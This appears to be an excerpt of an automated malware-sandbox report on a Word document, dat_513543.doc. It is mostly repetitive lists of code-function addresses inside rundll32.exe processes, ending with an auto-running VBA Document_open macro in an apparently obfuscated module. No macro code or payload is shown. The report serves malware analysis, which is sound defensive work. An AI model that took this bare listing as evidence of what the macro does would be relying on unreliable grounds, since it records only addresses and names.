Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00489B45	9_2_00489B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00476754	9_2_00476754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0047B75F	9_2_0047B75F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00480B68	9_2_00480B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0047C769	9_2_0047C769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0047E377	9_2_0047E377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00481773	9_2_00481773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00475B79	9_2_00475B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00478F78	9_2_00478F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00480F0C	9_2_00480F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00487D03	9_2_00487D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0048511B	9_2_0048511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00488D1C	9_2_00488D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00485D1D	9_2_00485D1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0047B112	9_2_0047B112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00487F1F	9_2_00487F1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00482B16	9_2_00482B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0047F536	9_2_0047F536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0047153C	9_2_0047153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00480D33	9_2_00480D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0047BB3A	9_2_0047BB3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00481BDF	9_2_00481BDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00479FDC	9_2_00479FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_004867E9	9_2_004867E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_004871EF	9_2_004871EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_004831E2	9_2_004831E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0047D7EB	9_2_0047D7EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00483FE7	9_2_00483FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0048878F	9_2_0048878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0047F98C	9_2_0047F98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00489586	9_2_00489586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00476D9F	9_2_00476D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0047839D	9_2_0047839D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00477998	9_2_00477998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_004873AC	9_2_004873AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_004769A0	9_2_004769A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_004717AC	9_2_004717AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_004861B8	9_2_004861B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00486DB9	9_2_00486DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0023B41F	10_2_0023B41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00232C63	10_2_00232C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0023EE78	10_2_0023EE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0023568E	10_2_0023568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00243895	10_2_00243895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0023C0C6	10_2_0023C0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002402C3	10_2_002402C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002442DA	10_2_002442DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00238736	10_2_00238736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00237B63	10_2_00237B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00244B41	10_2_00244B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002463C1	10_2_002463C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00232A30	10_2_00232A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00239A37	10_2_00239A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00234A35	10_2_00234A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00247A0F	10_2_00247A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0024340A	10_2_0024340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00245A61	10_2_00245A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0024687F	10_2_0024687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0023F444	10_2_0023F444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0023EA4C	10_2_0023EA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0023E05A	10_2_0023E05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002362A3	10_2_002362A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0024A0AF	10_2_0024A0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002380BA	10_2_002380BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002360B9	10_2_002360B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002348BD	10_2_002348BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00231280	10_2_00231280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0024889D	10_2_0024889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002388E5	10_2_002388E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002412E2	10_2_002412E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002426F5	10_2_002426F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00231CFA	10_2_00231CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002420C5	10_2_002420C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002396CD	10_2_002396CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00248ADC	10_2_00248ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0023F536	10_2_0023F536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00240D33	10_2_00240D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0023BB3A	10_2_0023BB3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0023153C	10_2_0023153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00247D03	10_2_00247D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00240F0C	10_2_00240F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0023B112	10_2_0023B112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00242B16	10_2_00242B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00248D1C	10_2_00248D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00245D1D	10_2_00245D1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00247F1F	10_2_00247F1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0024511B	10_2_0024511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0023C769	10_2_0023C769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00240B68	10_2_00240B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0023E377	10_2_0023E377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00241773	10_2_00241773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00235B79	10_2_00235B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00238F78	10_2_00238F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00249B45	10_2_00249B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00248F49	10_2_00248F49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00242349	10_2_00242349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00236754	10_2_00236754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0023B75F	10_2_0023B75F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002369A0	10_2_002369A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002473AC	10_2_002473AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002317AC	10_2_002317AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002461B8	10_2_002461B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00246DB9	10_2_00246DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00249586	10_2_00249586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0024878F	10_2_0024878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0023F98C	10_2_0023F98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00237998	10_2_00237998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00236D9F	10_2_00236D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0023839D	10_2_0023839D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00243FE7	10_2_00243FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002431E2	10_2_002431E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0023D7EB	10_2_0023D7EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002471EF	10_2_002471EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002467E9	10_2_002467E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00241BDF	10_2_00241BDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00239FDC	10_2_00239FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0027B41F	11_2_0027B41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00272C63	11_2_00272C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0027EE78	11_2_0027EE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0027568E	11_2_0027568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00283895	11_2_00283895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0027C0C6	11_2_0027C0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002802C3	11_2_002802C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002842DA	11_2_002842DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00278736	11_2_00278736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00277B63	11_2_00277B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00284B41	11_2_00284B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002863C1	11_2_002863C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00279A37	11_2_00279A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00274A35	11_2_00274A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00272A30	11_2_00272A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0028340A	11_2_0028340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00287A0F	11_2_00287A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00285A61	11_2_00285A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0028687F	11_2_0028687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0027F444	11_2_0027F444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0027EA4C	11_2_0027EA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0027E05A	11_2_0027E05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002762A3	11_2_002762A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0028A0AF	11_2_0028A0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002748BD	11_2_002748BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002780BA	11_2_002780BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002760B9	11_2_002760B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00271280	11_2_00271280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0028889D	11_2_0028889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002788E5	11_2_002788E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002812E2	11_2_002812E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00271CFA	11_2_00271CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002826F5	11_2_002826F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002796CD	11_2_002796CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002820C5	11_2_002820C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00288ADC	11_2_00288ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0027F536	11_2_0027F536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0027153C	11_2_0027153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00280D33	11_2_00280D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0027BB3A	11_2_0027BB3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00280F0C	11_2_00280F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00287D03	11_2_00287D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0028511B	11_2_0028511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00288D1C	11_2_00288D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00285D1D	11_2_00285D1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0027B112	11_2_0027B112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00287F1F	11_2_00287F1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00282B16	11_2_00282B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00280B68	11_2_00280B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0027C769	11_2_0027C769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0027E377	11_2_0027E377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00281773	11_2_00281773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00275B79	11_2_00275B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00278F78	11_2_00278F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00282349	11_2_00282349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00288F49	11_2_00288F49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00289B45	11_2_00289B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00276754	11_2_00276754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0027B75F	11_2_0027B75F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002873AC	11_2_002873AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002769A0	11_2_002769A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002717AC	11_2_002717AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002861B8	11_2_002861B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00286DB9	11_2_00286DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0028878F	11_2_0028878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0027F98C	11_2_0027F98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00289586	11_2_00289586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00276D9F	11_2_00276D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0027839D	11_2_0027839D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00277998	11_2_00277998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002867E9	11_2_002867E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002871EF	11_2_002871EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002831E2	11_2_002831E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0027D7EB	11_2_0027D7EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00283FE7	11_2_00283FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00281BDF	11_2_00281BDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00279FDC	11_2_00279FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022B41F	12_2_0022B41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00222C63	12_2_00222C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022EE78	12_2_0022EE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022568E	12_2_0022568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00233895	12_2_00233895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002302C3	12_2_002302C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022C0C6	12_2_0022C0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002342DA	12_2_002342DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00228736	12_2_00228736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00227B63	12_2_00227B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00234B41	12_2_00234B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002363C1	12_2_002363C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00222A30	12_2_00222A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00229A37	12_2_00229A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00224A35	12_2_00224A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0023340A	12_2_0023340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00237A0F	12_2_00237A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00235A61	12_2_00235A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0023687F	12_2_0023687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022F444	12_2_0022F444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022EA4C	12_2_0022EA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022E05A	12_2_0022E05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002262A3	12_2_002262A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0023A0AF	12_2_0023A0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002280BA	12_2_002280BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002260B9	12_2_002260B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002248BD	12_2_002248BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00221280	12_2_00221280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0023889D	12_2_0023889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002312E2	12_2_002312E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002288E5	12_2_002288E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002326F5	12_2_002326F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00221CFA	12_2_00221CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002320C5	12_2_002320C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002296CD	12_2_002296CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00238ADC	12_2_00238ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00230D33	12_2_00230D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022F536	12_2_0022F536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022BB3A	12_2_0022BB3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022153C	12_2_0022153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00237D03	12_2_00237D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00230F0C	12_2_00230F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022B112	12_2_0022B112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00232B16	12_2_00232B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0023511B	12_2_0023511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00237F1F	12_2_00237F1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00235D1D	12_2_00235D1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00238D1C	12_2_00238D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022C769	12_2_0022C769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00230B68	12_2_00230B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00231773	12_2_00231773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022E377	12_2_0022E377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00228F78	12_2_00228F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00225B79	12_2_00225B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00239B45	12_2_00239B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00232349	12_2_00232349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00238F49	12_2_00238F49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00226754	12_2_00226754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022B75F	12_2_0022B75F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002269A0	12_2_002269A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002217AC	12_2_002217AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002373AC	12_2_002373AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00236DB9	12_2_00236DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002361B8	12_2_002361B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00239586	12_2_00239586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0023878F	12_2_0023878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022F98C	12_2_0022F98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00227998	12_2_00227998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00226D9F	12_2_00226D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022839D	12_2_0022839D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002331E2	12_2_002331E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00233FE7	12_2_00233FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022D7EB	12_2_0022D7EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002367E9	12_2_002367E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002371EF	12_2_002371EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00231BDF	12_2_00231BDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00229FDC	12_2_00229FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0021B41F	13_2_0021B41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00212C63	13_2_00212C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0021EE78	13_2_0021EE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0021568E	13_2_0021568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00223895	13_2_00223895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_002202C3	13_2_002202C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0021C0C6	13_2_0021C0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_002242DA	13_2_002242DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00218736	13_2_00218736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00217B63	13_2_00217B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00224B41	13_2_00224B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_002263C1	13_2_002263C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00212A30	13_2_00212A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00214A35	13_2_00214A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00219A37	13_2_00219A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0022340A	13_2_0022340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00227A0F	13_2_00227A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00225A61	13_2_00225A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0022687F	13_2_0022687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0021F444	13_2_0021F444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0021EA4C	13_2_0021EA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0021E05A	13_2_0021E05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_002162A3	13_2_002162A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0022A0AF	13_2_0022A0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_002160B9	13_2_002160B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_002180BA	13_2_002180BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_002148BD	13_2_002148BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00211280	13_2_00211280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0022889D	13_2_0022889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_002212E2	13_2_002212E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_002188E5	13_2_002188E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_002226F5	13_2_002226F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00211CFA	13_2_00211CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_002220C5	13_2_002220C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_002196CD	13_2_002196CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00228ADC	13_2_00228ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00220D33	13_2_00220D33

Source: dat_513543.doc	OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation	OLE, VBA macro: Module A5gd21klfqu9c6rs, Function Document_open			Name: Document_open

Source: dat_513543.doc

